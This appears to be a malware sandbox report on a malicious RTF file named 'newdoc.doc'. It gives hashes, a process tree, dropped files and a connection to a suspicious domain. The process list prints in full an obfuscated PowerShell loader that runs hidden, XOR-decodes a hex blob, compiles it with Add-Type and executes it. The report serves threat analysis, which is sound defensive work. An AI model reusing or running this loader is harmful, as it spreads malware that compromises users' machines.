File name: | newdoc.doc |
Full analysis: | https://app.any.run/tasks/0c8e7ed2-db98-43e2-84a5-0c60e168a91a |
Verdict: | Malicious activity |
Analysis date: | October 09, 2019, 14:12:05 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | A757573938A4A607658A8CDA53197F20 |
SHA1: | C34CFE8839B81728E12F48DF713E414CD88E17CF |
SHA256: | C31EE1F58EC2B0A64D1831F81C6EA8244E92AD63DA3C5FBF211E70014ACB858C |
SSDEEP: | 1536:oZdVdUGXcirffa0nyH6D75orRSYp47VrNusr6lBjwjW3SAbEDCrOajsS:oHZXciryH6Zo5qpEEeaS |
.rtf | | | Rich Text Format (100) |
---|
InternalVersionNumber: | 57435 |
---|---|
CharactersWithSpaces: | 4 |
Characters: | 4 |
Words: | - |
Pages: | 1 |
TotalEditTime: | - |
RevisionNumber: | 1 |
ModifyDate: | 2019:01:07 23:54:00 |
CreateDate: | 2019:01:07 23:54:00 |
LastModifiedBy: | Admin |
Author: | Admin |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2824 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\newdoc.doc.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3812 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3604 | powershell -WindowStyle Hidden function hd3ba2 { param($x9dcbc) $vad12 = 'j4aa49';$p262ef7 = ''; for ($i = 0; $i -lt $x9dcbc.length; $i+=2) { $w9ab74 = [convert]::ToByte($x9dcbc.Substring($i, 2), 16); $p262ef7 += [char]($w9ab74 -bxor $vad12[($i / 2) % $vad12.length]); } return $p262ef7; } $xb64aec = '1f47080f5319394d12155154514112085a5e4a671812405c071a33145a4d0359044f7d571e51130e446a0f461708575c190f14125d570d143218474d0f594f255d580d5a0e12405009475a144750045341324d4a1e510c4f7d76514112085a5e4a671812405c071a2f044002673e1114565503574102585819474112030f0f0559594f622e580d2859490546154916520f460f04580a58164d245a4d184d310e5d571e094326514d3a460e02755d0e460412471b43694111415b065d0241474d0b400802145c124004135a19235a1531404b4a4d035256085b0249285a4d3a401341455a0f025750184a1e46080f53190e0104050500430f3a2558552359110e464d42160a0446570f58525316154a710f1546403a5b080f40195714432d5b580e7808034658184d434869191a41030d5d5a4a471500405009140419405c185a41285a4d3a401341595a0f015349474d185d0f0614435b5052520500430f3a2558552359110e464d42160a0446570f58525316154a710f1546403a5b080f400448620813404c0b5831135b4d0f5715431d644a441403585009141215554d035741044c4d0f460f4156560558411b555a0c0649285a4d3a4013415e000c57544d61700440311546191051005803154a41080f401901565407075846140e1440191f5d0f151451585550000310516f250d587007440e134011487f04135a5c0607534f505506164d4171571e4618315b5004405c43664d06790e1751740f590e134d1b4614320440750b471524464b05465c0755551951483c144a1e55150857190f4c150446574a420e08501905000750520d0c1c280f40691e464110570e5d0c044d7d571e64151314580b52075518500440411407080e51485a444c08580802144a1e5515085719035a1541455a580704055511434f280f40691e46410201005b525941091907570454061102505203550b4216510301005b06515905585f5051570101481d485a5d5f42575458055f52095c285a4d3a40134f6e5c185b481a53561e5b4102550e5f555a1c7d571e64151314580b0653550300574d035256085b02490201005b52594d5c5d595600531c1b58565458050b5a0c575601585a565400060a5b005453015f5a5255571610430f08071c580b06535503005709280f40691e464f3b514b051d1a065b4d05140200030c0b0f1c347d571e641513144b580054560d044261280f40691e4648540f4c035a15415b085257525c0402035249404e58095253495558580655560d15180655540300460419550415054115415b08525752481d420d5b150e145a0b0354000f44284d15046f644a5e59040d000b025c1a044159054d514c5f0c1851190d09170f280f40691e46410901085d055c2c554b195c000d1a7806580e027c7e065b03005811591d5a2c554b195c000d1a7a054418495e010f0d580002155a180954050e5b1852480f565e525007005f425a041614700440311546110b555353000e531a350e7d571e0255491d125a4c5151055b43180954050e5b1852480f5a0b0354000e193d51032258500f5a15414e5a5e51595609570f434136515b295808045a4d421d5a12404b035a0641505d58025058097c044208135b5707510f151a7e0f40270e585d0f463100405142710f175d4b055a0c045a4d4467110457500b58270e585d0f464f204449065d02004050055a25004058431f433d6853580d5002565b481f0905075b0b064943000d5f055058040d481d5a1b570d0f0c564f70561d5a0d0e555d2c5d0d041c510e07030006114804535504085f05505503095900545056095a045154070c5204075550095a055254500c5d050455510d0c045354560c5e0054540c095a055355040c5c045554050d0c045555570c0916484d505d580250581d023a460e02514a19671500464d235a070e145b0850055209570f434131465609511212674d0b4615285a5f051c0505060f5b0d485a644b05570412471739400013401108560505071051460415414b0414515a49491f560d085719194000155d5a4a4715135d570d140905075b0b064912404b035a0641510b0c5000484f4a1e46080f53191b570457020857160b5555585e0d435a474d185d0f06145409515453096a1e46080f53172f5911154d020c5b13495d571e14085c040203080453525d0b1a2d045a5e1e5c5a081f04581d1a034d4d0f141803075b5b05575c77560442041340173e5b2318405c42515307505844671403474d185d0f061c504606484d050f430f0c02510c581f5c4957510b4648494d5b59565050021934141002510f5c053a495d16581d4144144809515757051726510f064051371d5a1c465c1e41130f1454095154530f4417'; $xb64aec2 = hd3ba2($xb64aec); Add-Type -TypeDefinition $xb64aec2; [s76e188]::qc23eda(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3916 | "C:\Program Files\Microsoft Office\Office14\excelcnv.exe" -Embedding | C:\Program Files\Microsoft Office\Office14\excelcnv.exe | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3768 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\5memqf3_.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
3652 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES60FA.tmp" "c:\Users\admin\AppData\Local\Temp\CSC60E9.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2824 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4DDE.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3812 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR55BE.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3604 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XACL06STNEYW1SHC5O31.temp | — | |
MD5:— | SHA256:— | |||
3916 | excelcnv.exe | C:\Users\admin\AppData\Local\Temp\CVR5D40.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3916 | excelcnv.exe | C:\Users\admin\AppData\Local\Temp\~DFF51FE0967661821D.TMP | — | |
MD5:— | SHA256:— | |||
2824 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFACE1BD8AA1134693.TMP | — | |
MD5:— | SHA256:— | |||
3768 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSC60E9.tmp | — | |
MD5:— | SHA256:— | |||
3652 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RES60FA.tmp | — | |
MD5:— | SHA256:— | |||
3768 | csc.exe | C:\Users\admin\AppData\Local\Temp\5memqf3_.dll | — | |
MD5:— | SHA256:— | |||
3768 | csc.exe | C:\Users\admin\AppData\Local\Temp\5memqf3_.out | — | |
MD5:— | SHA256:— |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3604 | powershell.exe | 23.95.236.179:443 | aagaeyarintz.com | ColoCrossing | US | suspicious |
— | — | 23.95.236.179:443 | aagaeyarintz.com | ColoCrossing | US | suspicious |
Domain | IP | Reputation |
---|---|---|
aagaeyarintz.com |
| suspicious |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|